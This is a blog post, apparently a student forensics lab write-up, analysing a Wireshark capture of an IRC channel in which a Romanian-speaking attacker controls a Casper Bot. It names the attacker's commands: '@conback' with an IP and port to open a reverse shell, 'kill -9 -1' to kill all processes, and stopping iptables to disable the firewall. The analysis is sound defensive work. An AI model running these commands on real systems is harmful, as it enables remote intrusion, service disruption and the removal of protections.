Wednesday, September 16, 2015

Analyzing Wireshark Packet Captures

Wireshark Intro

I recommend going to How to Geek's tutorial for into to Wireshark. This way you can learn to capture packets and all the options that accompany that. Here we just take a simple packet capture and analyze it.

Computer Evidence Analyzed

Below is an image of the IRC relay we were able to isolate from the packet capture. We were able to determine the situation and attack occurring based off of the conversation between two people in the relay.
lab1_tcp_convo.png

Findings

Upon receiving the sanitized packet capture we opened it with Wireshark to view its details. By following the TCP route we isolated the IRC chat relay. The first thing we noticed was a conversation type rhythm in what appeared to be a different language. By copying and pasting the text into Google Translate we were able to determine that the conversation between the two users was in Romanian. By analyzing the conversation further we noticed there was a third party member of the conversation which we determined to be a bot responding to K3nt!’s commands.

There appeared to be four main technical actions taking place on a Unix system based on the commands given.
  • @conback command
    • By searching “@conback” we were able to determine this specific command was related to the Casper Bot. Further investigation revealed that this command when followed by an <ip address> and a <port> creates a reverse shell which gives K3nt! access to the targeted system. The IP address for this command is 74.208.109.177 port 2009. Doing a search on this IP address directs us to a hosting site in Philadelphia. This may or not be the attacker’s actual location but merely a host.
  • id command
    • The “id” command returned that K3nt! was logged in as root once they gained access to the system. We know K3nt! was root because of what the bot returned: uid=0(root) gid=0(root) groups=48(apache).
  • kill -9 -1 command
    • The “kill -9 -1” command basically slashes the process tree by killing all processes with a pid above 1. This essentially crashes the computer and forces a restart.
  • iptables service stop command
    • iptables is the Linux Firewall and K3nt! is clearly stopping the service and bringing down the fire wall.
After taking down the Linux Firewall K3nt! sends a final message: “I am scos ;))” which translates to “I am out” after which, the packet capture ends.

Conclusions

Through analysis of the packet capture and the isolated IRC relay we were able to conclusively determine that the attacker must have used an exploit of some kind to initially infect the victim system with the Casper Bot. Then the attacker was able to gain access to the system using the Casper Bot’s reverse shell and the @conback command. Once inside the system the attacker used the id command to verify their identity as root, use kill -9 -1 to do a quick restart of the system, and then use iptables to turn off the system firewall. Since this is then where the packet capture ends we can assume turning off the firewall was the main objective.
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)